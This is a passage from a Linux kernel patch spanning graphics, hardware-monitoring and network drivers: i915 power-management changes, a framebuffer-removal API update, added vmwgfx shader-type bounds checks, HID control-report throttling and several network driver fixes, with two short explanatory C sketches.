+ 		cs = gen8_emit_pipe_control(cs, PIPE_CONTROL_INSTRUCTION_CACHE_INVALIDATE, 0);
+ 
+-	/* hsdes: 1809175790 */
+-	if (!HAS_FLAT_CCS(ce->engine->i915))
+-		cs = gen12_emit_aux_table_inv(ce->engine->gt,
+-					      cs, GEN12_CCS_AUX_INV);
++	cs = gen12_emit_aux_table_inv(ce->engine, cs);
+ 
+ 	/* Wa_16014892111 */
+ 	if (IS_DG2(ce->engine->i915))
+@@ -1322,17 +1319,7 @@ gen12_emit_indirect_ctx_xcs(const struct intel_context *ce, u32 *cs)
+ 						    PIPE_CONTROL_INSTRUCTION_CACHE_INVALIDATE,
+ 						    0);
+ 
+-	/* hsdes: 1809175790 */
+-	if (!HAS_FLAT_CCS(ce->engine->i915)) {
+-		if (ce->engine->class == VIDEO_DECODE_CLASS)
+-			cs = gen12_emit_aux_table_inv(ce->engine->gt,
+-						      cs, GEN12_VD0_AUX_INV);
+-		else if (ce->engine->class == VIDEO_ENHANCEMENT_CLASS)
+-			cs = gen12_emit_aux_table_inv(ce->engine->gt,
+-						      cs, GEN12_VE0_AUX_INV);
+-	}
+-
+-	return cs;
++	return gen12_emit_aux_table_inv(ce->engine, cs);
+ }
+ 
+ static void
+diff --git a/drivers/gpu/drm/i915/i915_driver.c b/drivers/gpu/drm/i915/i915_driver.c
+index 35bc2a3fa811c..75a93951fe429 100644
+--- a/drivers/gpu/drm/i915/i915_driver.c
++++ b/drivers/gpu/drm/i915/i915_driver.c
+@@ -574,7 +574,6 @@ static int i915_pcode_init(struct drm_i915_private *i915)
+ static int i915_driver_hw_probe(struct drm_i915_private *dev_priv)
+ {
+ 	struct pci_dev *pdev = to_pci_dev(dev_priv->drm.dev);
+-	struct pci_dev *root_pdev;
+ 	int ret;
+ 
+ 	if (i915_inject_probe_failure(dev_priv))
+@@ -686,15 +685,6 @@ static int i915_driver_hw_probe(struct drm_i915_private *dev_priv)
+ 
+ 	intel_bw_init_hw(dev_priv);
+ 
+-	/*
+-	 * FIXME: Temporary hammer to avoid freezing the machine on our DGFX
+-	 * This should be totally removed when we handle the pci states properly
+-	 * on runtime PM and on s2idle cases.
+-	 */
+-	root_pdev = pcie_find_root_port(pdev);
+-	if (root_pdev)
+-		pci_d3cold_disable(root_pdev);
+-
+ 	return 0;
+ 
+ err_msi:
+@@ -718,16 +708,11 @@ err_perf:
+ static void i915_driver_hw_remove(struct drm_i915_private *dev_priv)
+ {
+ 	struct pci_dev *pdev = to_pci_dev(dev_priv->drm.dev);
+-	struct pci_dev *root_pdev;
+ 
+ 	i915_perf_fini(dev_priv);
+ 
+ 	if (pdev->msi_enabled)
+ 		pci_disable_msi(pdev);
+-
+-	root_pdev = pcie_find_root_port(pdev);
+-	if (root_pdev)
+-		pci_d3cold_enable(root_pdev);
+ }
+ 
+ /**
+@@ -1625,6 +1610,8 @@ static int intel_runtime_suspend(struct device *kdev)
+ {
+ 	struct drm_i915_private *dev_priv = kdev_to_i915(kdev);
+ 	struct intel_runtime_pm *rpm = &dev_priv->runtime_pm;
++	struct pci_dev *pdev = to_pci_dev(dev_priv->drm.dev);
++	struct pci_dev *root_pdev;
+ 	struct intel_gt *gt;
+ 	int ret, i;
+ 
+@@ -1674,6 +1661,15 @@ static int intel_runtime_suspend(struct device *kdev)
+ 		drm_err(&dev_priv->drm,
+ 			"Unclaimed access detected prior to suspending\n");
+ 
++	/*
++	 * FIXME: Temporary hammer to avoid freezing the machine on our DGFX
++	 * This should be totally removed when we handle the pci states properly
++	 * on runtime PM.
++	 */
++	root_pdev = pcie_find_root_port(pdev);
++	if (root_pdev)
++		pci_d3cold_disable(root_pdev);
++
+ 	rpm->suspended = true;
+ 
+ 	/*
+@@ -1712,6 +1708,8 @@ static int intel_runtime_resume(struct device *kdev)
+ {
+ 	struct drm_i915_private *dev_priv = kdev_to_i915(kdev);
+ 	struct intel_runtime_pm *rpm = &dev_priv->runtime_pm;
++	struct pci_dev *pdev = to_pci_dev(dev_priv->drm.dev);
++	struct pci_dev *root_pdev;
+ 	struct intel_gt *gt;
+ 	int ret, i;
+ 
+@@ -1725,6 +1723,11 @@ static int intel_runtime_resume(struct device *kdev)
+ 
+ 	intel_opregion_notify_adapter(dev_priv, PCI_D0);
+ 	rpm->suspended = false;
++
++	root_pdev = pcie_find_root_port(pdev);
++	if (root_pdev)
++		pci_d3cold_enable(root_pdev);
++
+ 	if (intel_uncore_unclaimed_mmio(&dev_priv->uncore))
+ 		drm_dbg(&dev_priv->drm,
+ 			"Unclaimed access during suspend, bios?\n");
+diff --git a/drivers/gpu/drm/meson/meson_drv.c b/drivers/gpu/drm/meson/meson_drv.c
+index eea433ade79d0..119544d88b586 100644
+--- a/drivers/gpu/drm/meson/meson_drv.c
++++ b/drivers/gpu/drm/meson/meson_drv.c
+@@ -285,7 +285,7 @@ static int meson_drv_bind_master(struct device *dev, bool has_components)
+ 	 * Remove early framebuffers (ie. simplefb). The framebuffer can be
+ 	 * located anywhere in RAM
+ 	 */
+-	ret = drm_aperture_remove_framebuffers(false, &meson_driver);
++	ret = drm_aperture_remove_framebuffers(&meson_driver);
+ 	if (ret)
+ 		goto free_drm;
+ 
+diff --git a/drivers/gpu/drm/msm/msm_fbdev.c b/drivers/gpu/drm/msm/msm_fbdev.c
+index 46168eccfac4a..d4a9b501e1bcc 100644
+--- a/drivers/gpu/drm/msm/msm_fbdev.c
++++ b/drivers/gpu/drm/msm/msm_fbdev.c
+@@ -157,7 +157,7 @@ struct drm_fb_helper *msm_fbdev_init(struct drm_device *dev)
+ 	}
+ 
+ 	/* the fw fb could be anywhere in memory */
+-	ret = drm_aperture_remove_framebuffers(false, dev->driver);
++	ret = drm_aperture_remove_framebuffers(dev->driver);
+ 	if (ret)
+ 		goto fini;
+ 
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_drv.c b/drivers/gpu/drm/rockchip/rockchip_drm_drv.c
+index 813f9f8c86982..8e12053a220b0 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_drv.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_drv.c
+@@ -140,7 +140,7 @@ static int rockchip_drm_bind(struct device *dev)
+ 	int ret;
+ 
+ 	/* Remove existing drivers that may own the framebuffer memory. */
+-	ret = drm_aperture_remove_framebuffers(false, &rockchip_drm_driver);
++	ret = drm_aperture_remove_framebuffers(&rockchip_drm_driver);
+ 	if (ret) {
+ 		DRM_DEV_ERROR(dev,
+ 			      "Failed to remove existing framebuffers - %d.\n",
+diff --git a/drivers/gpu/drm/stm/drv.c b/drivers/gpu/drm/stm/drv.c
+index d7914f5122dff..0a09a85ac9d69 100644
+--- a/drivers/gpu/drm/stm/drv.c
++++ b/drivers/gpu/drm/stm/drv.c
+@@ -185,7 +185,7 @@ static int stm_drm_platform_probe(struct platform_device *pdev)
+ 
+ 	DRM_DEBUG("%s\n", __func__);
+ 
+-	ret = drm_aperture_remove_framebuffers(false, &drv_driver);
++	ret = drm_aperture_remove_framebuffers(&drv_driver);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/gpu/drm/sun4i/sun4i_drv.c b/drivers/gpu/drm/sun4i/sun4i_drv.c
+index 7910c5853f0a8..5c483bbccbbbc 100644
+--- a/drivers/gpu/drm/sun4i/sun4i_drv.c
++++ b/drivers/gpu/drm/sun4i/sun4i_drv.c
+@@ -98,7 +98,7 @@ static int sun4i_drv_bind(struct device *dev)
+ 		goto unbind_all;
+ 
+ 	/* Remove early framebuffers (ie. simplefb) */
+-	ret = drm_aperture_remove_framebuffers(false, &sun4i_drv_driver);
++	ret = drm_aperture_remove_framebuffers(&sun4i_drv_driver);
+ 	if (ret)
+ 		goto unbind_all;
+ 
+diff --git a/drivers/gpu/drm/tegra/drm.c b/drivers/gpu/drm/tegra/drm.c
+index a1f909dac89a7..5fc55b9777cbf 100644
+--- a/drivers/gpu/drm/tegra/drm.c
++++ b/drivers/gpu/drm/tegra/drm.c
+@@ -1252,7 +1252,7 @@ static int host1x_drm_probe(struct host1x_device *dev)
+ 
+ 	drm_mode_config_reset(drm);
+ 
+-	err = drm_aperture_remove_framebuffers(false, &tegra_drm_driver);
++	err = drm_aperture_remove_framebuffers(&tegra_drm_driver);
+ 	if (err < 0)
+ 		goto hub;
+ 
+diff --git a/drivers/gpu/drm/vc4/vc4_drv.c b/drivers/gpu/drm/vc4/vc4_drv.c
+index 8c329c071c62d..b6384a5dfdbc1 100644
+--- a/drivers/gpu/drm/vc4/vc4_drv.c
++++ b/drivers/gpu/drm/vc4/vc4_drv.c
+@@ -351,7 +351,7 @@ static int vc4_drm_bind(struct device *dev)
+ 			return -EPROBE_DEFER;
+ 	}
+ 
+-	ret = drm_aperture_remove_framebuffers(false, driver);
++	ret = drm_aperture_remove_framebuffers(driver);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
+index 1ec9c53a7bf43..8459fab9d9797 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
+@@ -1683,4 +1683,16 @@ static inline bool vmw_has_fences(struct vmw_private *vmw)
+ 	return (vmw_fifo_caps(vmw) & SVGA_FIFO_CAP_FENCE) != 0;
+ }
+ 
++static inline bool vmw_shadertype_is_valid(enum vmw_sm_type shader_model,
++					   u32 shader_type)
++{
++	SVGA3dShaderType max_allowed = SVGA3D_SHADERTYPE_PREDX_MAX;
++
++	if (shader_model >= VMW_SM_5)
++		max_allowed = SVGA3D_SHADERTYPE_MAX;
++	else if (shader_model >= VMW_SM_4)
++		max_allowed = SVGA3D_SHADERTYPE_DX10_MAX;
++	return shader_type >= SVGA3D_SHADERTYPE_MIN && shader_type < max_allowed;
++}
++
+ #endif
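
vmw_shadertype_is_valid() replaces three slightly different open-coded range checks with one helper: derive the upper bound from the supported shader model, then bounds-check the type. A standalone sketch with invented limit values (the real SVGA3D constants differ):

    #include <stdbool.h>
    #include <stdio.h>

    enum sm { SM_LEGACY, SM_4, SM_5 };

    #define TYPE_MIN   1   /* illustrative limits, not the SVGA3D values */
    #define PREDX_MAX  4
    #define DX10_MAX   6
    #define TYPE_MAX   9

    static bool shadertype_is_valid(enum sm model, unsigned int type)
    {
        unsigned int max_allowed = PREDX_MAX;

        if (model >= SM_5)
            max_allowed = TYPE_MAX;
        else if (model >= SM_4)
            max_allowed = DX10_MAX;
        return type >= TYPE_MIN && type < max_allowed;
    }

    int main(void)
    {
        printf("%d %d\n", shadertype_is_valid(SM_LEGACY, 5),   /* 0 */
               shadertype_is_valid(SM_5, 5));                  /* 1 */
        return 0;
    }
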
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c b/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
+index 1c88b74d68cf0..58ca9adf09871 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
+@@ -1985,7 +1985,7 @@ static int vmw_cmd_set_shader(struct vmw_private *dev_priv,
+ 
+ 	cmd = container_of(header, typeof(*cmd), header);
+ 
+-	if (cmd->body.type >= SVGA3D_SHADERTYPE_PREDX_MAX) {
++	if (!vmw_shadertype_is_valid(VMW_SM_LEGACY, cmd->body.type)) {
+ 		VMW_DEBUG_USER("Illegal shader type %u.\n",
+ 			       (unsigned int) cmd->body.type);
+ 		return -EINVAL;
+@@ -2108,8 +2108,6 @@ vmw_cmd_dx_set_single_constant_buffer(struct vmw_private *dev_priv,
+ 				      SVGA3dCmdHeader *header)
+ {
+ 	VMW_DECLARE_CMD_VAR(*cmd, SVGA3dCmdDXSetSingleConstantBuffer);
+-	SVGA3dShaderType max_shader_num = has_sm5_context(dev_priv) ?
+-		SVGA3D_NUM_SHADERTYPE : SVGA3D_NUM_SHADERTYPE_DX10;
+ 
+ 	struct vmw_resource *res = NULL;
+ 	struct vmw_ctx_validation_info *ctx_node = VMW_GET_CTX_NODE(sw_context);
+@@ -2126,6 +2124,14 @@ vmw_cmd_dx_set_single_constant_buffer(struct vmw_private *dev_priv,
+ 	if (unlikely(ret != 0))
+ 		return ret;
+ 
++	if (!vmw_shadertype_is_valid(dev_priv->sm_type, cmd->body.type) ||
++	    cmd->body.slot >= SVGA3D_DX_MAX_CONSTBUFFERS) {
++		VMW_DEBUG_USER("Illegal const buffer shader %u slot %u.\n",
++			       (unsigned int) cmd->body.type,
++			       (unsigned int) cmd->body.slot);
++		return -EINVAL;
++	}
++
+ 	binding.bi.ctx = ctx_node->ctx;
+ 	binding.bi.res = res;
+ 	binding.bi.bt = vmw_ctx_binding_cb;
+@@ -2134,14 +2140,6 @@ vmw_cmd_dx_set_single_constant_buffer(struct vmw_private *dev_priv,
+ 	binding.size = cmd->body.sizeInBytes;
+ 	binding.slot = cmd->body.slot;
+ 
+-	if (binding.shader_slot >= max_shader_num ||
+-	    binding.slot >= SVGA3D_DX_MAX_CONSTBUFFERS) {
+-		VMW_DEBUG_USER("Illegal const buffer shader %u slot %u.\n",
+-			       (unsigned int) cmd->body.type,
+-			       (unsigned int) binding.slot);
+-		return -EINVAL;
+-	}
+-
+ 	vmw_binding_add(ctx_node->staged, &binding.bi, binding.shader_slot,
+ 			binding.slot);
+ 
+@@ -2200,15 +2198,13 @@ static int vmw_cmd_dx_set_shader_res(struct vmw_private *dev_priv,
+ {
+ 	VMW_DECLARE_CMD_VAR(*cmd, SVGA3dCmdDXSetShaderResources) =
+ 		container_of(header, typeof(*cmd), header);
+-	SVGA3dShaderType max_allowed = has_sm5_context(dev_priv) ?
+-		SVGA3D_SHADERTYPE_MAX : SVGA3D_SHADERTYPE_DX10_MAX;
+ 
+ 	u32 num_sr_view = (cmd->header.size - sizeof(cmd->body)) /
+ 		sizeof(SVGA3dShaderResourceViewId);
+ 
+ 	if ((u64) cmd->body.startView + (u64) num_sr_view >
+ 	    (u64) SVGA3D_DX_MAX_SRVIEWS ||
+-	    cmd->body.type >= max_allowed) {
++	    !vmw_shadertype_is_valid(dev_priv->sm_type, cmd->body.type)) {
+ 		VMW_DEBUG_USER("Invalid shader binding.\n");
+ 		return -EINVAL;
+ 	}
+@@ -2232,8 +2228,6 @@ static int vmw_cmd_dx_set_shader(struct vmw_private *dev_priv,
+ 				 SVGA3dCmdHeader *header)
+ {
+ 	VMW_DECLARE_CMD_VAR(*cmd, SVGA3dCmdDXSetShader);
+-	SVGA3dShaderType max_allowed = has_sm5_context(dev_priv) ?
+-		SVGA3D_SHADERTYPE_MAX : SVGA3D_SHADERTYPE_DX10_MAX;
+ 	struct vmw_resource *res = NULL;
+ 	struct vmw_ctx_validation_info *ctx_node = VMW_GET_CTX_NODE(sw_context);
+ 	struct vmw_ctx_bindinfo_shader binding;
+@@ -2244,8 +2238,7 @@ static int vmw_cmd_dx_set_shader(struct vmw_private *dev_priv,
+ 
+ 	cmd = container_of(header, typeof(*cmd), header);
+ 
+-	if (cmd->body.type >= max_allowed ||
+-	    cmd->body.type < SVGA3D_SHADERTYPE_MIN) {
++	if (!vmw_shadertype_is_valid(dev_priv->sm_type, cmd->body.type)) {
+ 		VMW_DEBUG_USER("Illegal shader type %u.\n",
+ 			       (unsigned int) cmd->body.type);
+ 		return -EINVAL;
+diff --git a/drivers/hwmon/aquacomputer_d5next.c b/drivers/hwmon/aquacomputer_d5next.c
+index c51a2678f0eb5..8c7796d3fdd2d 100644
+--- a/drivers/hwmon/aquacomputer_d5next.c
++++ b/drivers/hwmon/aquacomputer_d5next.c
+@@ -12,9 +12,11 @@
+ 
+ #include <linux/crc16.h>
+ #include <linux/debugfs.h>
++#include <linux/delay.h>
+ #include <linux/hid.h>
+ #include <linux/hwmon.h>
+ #include <linux/jiffies.h>
++#include <linux/ktime.h>
+ #include <linux/module.h>
+ #include <linux/mutex.h>
+ #include <linux/seq_file.h>
+@@ -49,6 +51,8 @@ static const char *const aqc_device_names[] = {
+ 
+ #define CTRL_REPORT_ID			0x03
+ 
++#define CTRL_REPORT_DELAY		200	/* ms */
++
+ /* The HID report that the official software always sends
+  * after writing values, currently same for all devices
+  */
+@@ -269,6 +273,9 @@ struct aqc_data {
+ 	enum kinds kind;
+ 	const char *name;
+ 
++	ktime_t last_ctrl_report_op;
++	int ctrl_report_delay;	/* Delay between two ctrl report operations, in ms */
++
+ 	int buffer_size;
+ 	u8 *buffer;
+ 	int checksum_start;
+@@ -325,17 +332,35 @@ static int aqc_pwm_to_percent(long val)
+ 	return DIV_ROUND_CLOSEST(val * 100 * 100, 255);
+ }
+ 
++static void aqc_delay_ctrl_report(struct aqc_data *priv)
++{
++	/*
++	 * If previous read or write is too close to this one, delay the current operation
++	 * to give the device enough time to process the previous one.
++	 */
++	if (priv->ctrl_report_delay) {
++		s64 delta = ktime_ms_delta(ktime_get(), priv->last_ctrl_report_op);
++
++		if (delta < priv->ctrl_report_delay)
++			msleep(priv->ctrl_report_delay - delta);
++	}
++}
++
+ /* Expects the mutex to be locked */
+ static int aqc_get_ctrl_data(struct aqc_data *priv)
+ {
+ 	int ret;
+ 
++	aqc_delay_ctrl_report(priv);
++
+ 	memset(priv->buffer, 0x00, priv->buffer_size);
+ 	ret = hid_hw_raw_request(priv->hdev, CTRL_REPORT_ID, priv->buffer, priv->buffer_size,
+ 				 HID_FEATURE_REPORT, HID_REQ_GET_REPORT);
+ 	if (ret < 0)
+ 		ret = -ENODATA;
+ 
++	priv->last_ctrl_report_op = ktime_get();
++
+ 	return ret;
+ }
+ 
+@@ -345,6 +370,8 @@ static int aqc_send_ctrl_data(struct aqc_data *priv)
+ 	int ret;
+ 	u16 checksum;
+ 
++	aqc_delay_ctrl_report(priv);
++
+ 	/* Init and xorout value for CRC-16/USB is 0xffff */
+ 	checksum = crc16(0xffff, priv->buffer + priv->checksum_start, priv->checksum_length);
+ 	checksum ^= 0xffff;
+@@ -356,12 +383,16 @@ static int aqc_send_ctrl_data(struct aqc_data *priv)
+ 	ret = hid_hw_raw_request(priv->hdev, CTRL_REPORT_ID, priv->buffer, priv->buffer_size,
+ 				 HID_FEATURE_REPORT, HID_REQ_SET_REPORT);
+ 	if (ret < 0)
+-		return ret;
++		goto record_access_and_ret;
+ 
+ 	/* The official software sends this report after every change, so do it here as well */
+ 	ret = hid_hw_raw_request(priv->hdev, SECONDARY_CTRL_REPORT_ID, secondary_ctrl_report,
+ 				 SECONDARY_CTRL_REPORT_SIZE, HID_FEATURE_REPORT,
+ 				 HID_REQ_SET_REPORT);
++
++record_access_and_ret:
++	priv->last_ctrl_report_op = ktime_get();
++
+ 	return ret;
+ }
+ 
+@@ -853,6 +884,7 @@ static int aqc_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 		priv->virtual_temp_sensor_start_offset = D5NEXT_VIRTUAL_SENSORS_START;
+ 		priv->power_cycle_count_offset = D5NEXT_POWER_CYCLES;
+ 		priv->buffer_size = D5NEXT_CTRL_REPORT_SIZE;
++		priv->ctrl_report_delay = CTRL_REPORT_DELAY;
+ 
+ 		priv->temp_label = label_d5next_temp;
+ 		priv->virtual_temp_label = label_virtual_temp_sensors;
+@@ -893,6 +925,7 @@ static int aqc_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 		priv->virtual_temp_sensor_start_offset = OCTO_VIRTUAL_SENSORS_START;
+ 		priv->power_cycle_count_offset = OCTO_POWER_CYCLES;
+ 		priv->buffer_size = OCTO_CTRL_REPORT_SIZE;
++		priv->ctrl_report_delay = CTRL_REPORT_DELAY;
+ 
+ 		priv->temp_label = label_temp_sensors;
+ 		priv->virtual_temp_label = label_virtual_temp_sensors;
+@@ -913,6 +946,7 @@ static int aqc_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 		priv->virtual_temp_sensor_start_offset = QUADRO_VIRTUAL_SENSORS_START;
+ 		priv->power_cycle_count_offset = QUADRO_POWER_CYCLES;
+ 		priv->buffer_size = QUADRO_CTRL_REPORT_SIZE;
++		priv->ctrl_report_delay = CTRL_REPORT_DELAY;
+ 		priv->flow_sensor_offset = QUADRO_FLOW_SENSOR_OFFSET;
+ 
+ 		priv->temp_label = label_temp_sensors;
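
The driver change above throttles back-to-back control reports: record a timestamp after every operation and sleep off whatever is left of a 200 ms minimum gap before starting the next one. A userspace analogue using CLOCK_MONOTONIC (the kernel code uses ktime_ms_delta() and msleep(); the gap value mirrors CTRL_REPORT_DELAY):

    #include <stdio.h>
    #include <time.h>

    #define MIN_GAP_MS 200

    static long long now_ms(void)
    {
        struct timespec ts;
        clock_gettime(CLOCK_MONOTONIC, &ts);
        return ts.tv_sec * 1000LL + ts.tv_nsec / 1000000;
    }

    static long long last_op_ms;

    static void ctrl_op(const char *what)
    {
        long long delta = now_ms() - last_op_ms;

        if (delta < MIN_GAP_MS) {           /* too close to the last op */
            struct timespec gap = { 0, (MIN_GAP_MS - delta) * 1000000L };
            nanosleep(&gap, NULL);
        }
        printf("%s\n", what);               /* the HID request would go here */
        last_op_ms = now_ms();
    }

    int main(void)
    {
        ctrl_op("get ctrl report");
        ctrl_op("send ctrl report");        /* lands >= 200 ms after the get */
        return 0;
    }
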
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_enc.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_enc.c
+index d810a78dde51d..31e3c37662185 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_enc.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_enc.c
+@@ -821,6 +821,8 @@ static int vb2ops_venc_queue_setup(struct vb2_queue *vq,
+ 		return -EINVAL;
+ 
+ 	if (*nplanes) {
++		if (*nplanes != q_data->fmt->num_planes)
++			return -EINVAL;
+ 		for (i = 0; i < *nplanes; i++)
+ 			if (sizes[i] < q_data->sizeimage[i])
+ 				return -EINVAL;
+diff --git a/drivers/net/bonding/bond_alb.c b/drivers/net/bonding/bond_alb.c
+index b9dbad3a8af82..fc5da5d7744da 100644
+--- a/drivers/net/bonding/bond_alb.c
++++ b/drivers/net/bonding/bond_alb.c
+@@ -660,10 +660,10 @@ static struct slave *rlb_arp_xmit(struct sk_buff *skb, struct bonding *bond)
+ 		return NULL;
+ 	arp = (struct arp_pkt *)skb_network_header(skb);
+ 
+-	/* Don't modify or load balance ARPs that do not originate locally
+-	 * (e.g.,arrive via a bridge).
++	/* Don't modify or load balance ARPs that do not originate
++	 * from the bond itself or a VLAN directly above the bond.
+ 	 */
+-	if (!bond_slave_has_mac_rx(bond, arp->mac_src))
++	if (!bond_slave_has_mac_rcu(bond, arp->mac_src))
+ 		return NULL;
+ 
+ 	dev = ip_dev_find(dev_net(bond->dev), arp->ip_src);
+diff --git a/drivers/net/can/vxcan.c b/drivers/net/can/vxcan.c
+index 26a472d2ea583..6d549dbdb4674 100644
+--- a/drivers/net/can/vxcan.c
++++ b/drivers/net/can/vxcan.c
+@@ -192,12 +192,7 @@ static int vxcan_newlink(struct net *net, struct net_device *dev,
+ 
+ 		nla_peer = data[VXCAN_INFO_PEER];
+ 		ifmp = nla_data(nla_peer);
+-		err = rtnl_nla_parse_ifla(peer_tb,
+-					  nla_data(nla_peer) +
+-					  sizeof(struct ifinfomsg),
+-					  nla_len(nla_peer) -
+-					  sizeof(struct ifinfomsg),
+-					  NULL);
++		err = rtnl_nla_parse_ifinfomsg(peer_tb, nla_peer, extack);
+ 		if (err < 0)
+ 			return err;
+ 
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index 51d2ef0dc835c..b988c8a40d536 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -1005,6 +1005,10 @@ mt753x_trap_frames(struct mt7530_priv *priv)
+ 	mt7530_rmw(priv, MT753X_BPC, MT753X_BPDU_PORT_FW_MASK,
+ 		   MT753X_BPDU_CPU_ONLY);
+ 
++	/* Trap 802.1X PAE frames to the CPU port(s) */
++	mt7530_rmw(priv, MT753X_BPC, MT753X_PAE_PORT_FW_MASK,
++		   MT753X_PAE_PORT_FW(MT753X_BPDU_CPU_ONLY));
++
+ 	/* Trap LLDP frames with :0E MAC DA to the CPU port(s) */
+ 	mt7530_rmw(priv, MT753X_RGAC2, MT753X_R0E_PORT_FW_MASK,
+ 		   MT753X_R0E_PORT_FW(MT753X_BPDU_CPU_ONLY));
+diff --git a/drivers/net/dsa/mt7530.h b/drivers/net/dsa/mt7530.h
+index 9a45663d8b4ef..6202b0f8c3f34 100644
+--- a/drivers/net/dsa/mt7530.h
++++ b/drivers/net/dsa/mt7530.h
+@@ -64,6 +64,8 @@ enum mt753x_id {
+ /* Registers for BPDU and PAE frame control*/
+ #define MT753X_BPC			0x24
+ #define  MT753X_BPDU_PORT_FW_MASK	GENMASK(2, 0)
++#define  MT753X_PAE_PORT_FW_MASK	GENMASK(18, 16)
++#define  MT753X_PAE_PORT_FW(x)		FIELD_PREP(MT753X_PAE_PORT_FW_MASK, x)
+ 
+ /* Register for :03 and :0E MAC DA frame control */
+ #define MT753X_RGAC2			0x2c
+diff --git a/drivers/net/dsa/ocelot/felix_vsc9959.c b/drivers/net/dsa/ocelot/felix_vsc9959.c
+index 5f6af0870dfd6..0186482194d20 100644
+--- a/drivers/net/dsa/ocelot/felix_vsc9959.c
++++ b/drivers/net/dsa/ocelot/felix_vsc9959.c
+@@ -1071,6 +1071,9 @@ static u64 vsc9959_tas_remaining_gate_len_ps(u64 gate_len_ns)
+ 	if (gate_len_ns == U64_MAX)
+ 		return U64_MAX;
+ 
++	if (gate_len_ns < VSC9959_TAS_MIN_GATE_LEN_NS)
++		return 0;
++
+ 	return (gate_len_ns - VSC9959_TAS_MIN_GATE_LEN_NS) * PSEC_PER_NSEC;
+ }
+ 
+diff --git a/drivers/net/ethernet/broadcom/bgmac.c b/drivers/net/ethernet/broadcom/bgmac.c
+index 10c7c232cc4ec..52ee3751187a2 100644
+--- a/drivers/net/ethernet/broadcom/bgmac.c
++++ b/drivers/net/ethernet/broadcom/bgmac.c
+@@ -1448,7 +1448,7 @@ int bgmac_phy_connect_direct(struct bgmac *bgmac)
+ 	int err;
+ 
+ 	phy_dev = fixed_phy_register(PHY_POLL, &fphy_status, NULL);
+-	if (!phy_dev || IS_ERR(phy_dev)) {
++	if (IS_ERR(phy_dev)) {
+ 		dev_err(bgmac->dev, "Failed to register fixed PHY device\n");
+ 		return -ENODEV;
+ 	}
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmmii.c b/drivers/net/ethernet/broadcom/genet/bcmmii.c
+index 1fe8038587ac8..1779ee524dac7 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmmii.c
++++ b/drivers/net/ethernet/broadcom/genet/bcmmii.c
+@@ -608,7 +608,7 @@ static int bcmgenet_mii_pd_init(struct bcmgenet_priv *priv)
+ 		};
+ 
+ 		phydev = fixed_phy_register(PHY_POLL, &fphy_status, NULL);
+-		if (!phydev || IS_ERR(phydev)) {
++		if (IS_ERR(phydev)) {
+ 			dev_err(kdev, "failed to register fixed PHY device\n");
+ 			return -ENODEV;
+ 		}
+diff --git a/drivers/net/ethernet/chelsio/inline_crypto/chtls/chtls_cm.c b/drivers/net/ethernet/chelsio/inline_crypto/chtls/chtls_cm.c
+index c2e7037c7ba1c..7750702900fa6 100644
+--- a/drivers/net/ethernet/chelsio/inline_crypto/chtls/chtls_cm.c
++++ b/drivers/net/ethernet/chelsio/inline_crypto/chtls/chtls_cm.c
+@@ -1466,7 +1466,7 @@ static void make_established(struct sock *sk, u32 snd_isn, unsigned int opt)
+ 	tp->write_seq = snd_isn;
+ 	tp->snd_nxt = snd_isn;
+ 	tp->snd_una = snd_isn;
+-	inet_sk(sk)->inet_id = get_random_u16();
++	atomic_set(&inet_sk(sk)->inet_id, get_random_u16());
+ 	assign_rxopt(sk, opt);
+ 
+ 	if (tp->rcv_wnd > (RCV_BUFSIZ_M << 10))
+diff --git a/drivers/net/ethernet/ibm/ibmveth.c b/drivers/net/ethernet/ibm/ibmveth.c
+index 5b96cd94dcd24..0b4ec6e41eb41 100644
+--- a/drivers/net/ethernet/ibm/ibmveth.c
++++ b/drivers/net/ethernet/ibm/ibmveth.c
+@@ -203,7 +203,7 @@ static inline void ibmveth_flush_buffer(void *addr, unsigned long length)
+ 	unsigned long offset;
+ 
+ 	for (offset = 0; offset < length; offset += SMP_CACHE_BYTES)
+-		asm("dcbfl %0,%1" :: "b" (addr), "r" (offset));
++		asm("dcbf %0,%1,1" :: "b" (addr), "r" (offset));
+ }
+ 
+ /* replenish the buffers for a pool.  note that we don't need to
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index 0e01b1927c1c6..08ccf0024ce1a 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -2615,7 +2615,7 @@ int i40e_sync_vsi_filters(struct i40e_vsi *vsi)
+ 			retval = i40e_correct_mac_vlan_filters
+ 				(vsi, &tmp_add_list, &tmp_del_list,
+ 				 vlan_filters);
+-		else
++		else if (pf->vf)
+ 			retval = i40e_correct_vf_mac_vlan_filters
+ 				(vsi, &tmp_add_list, &tmp_del_list,
+ 				 vlan_filters, pf->vf[vsi->vf_id].trusted);
+@@ -2788,7 +2788,8 @@ int i40e_sync_vsi_filters(struct i40e_vsi *vsi)
+ 	}
+ 
+ 	/* if the VF is not trusted do not do promisc */
+-	if ((vsi->type == I40E_VSI_SRIOV) && !pf->vf[vsi->vf_id].trusted) {
++	if (vsi->type == I40E_VSI_SRIOV && pf->vf &&
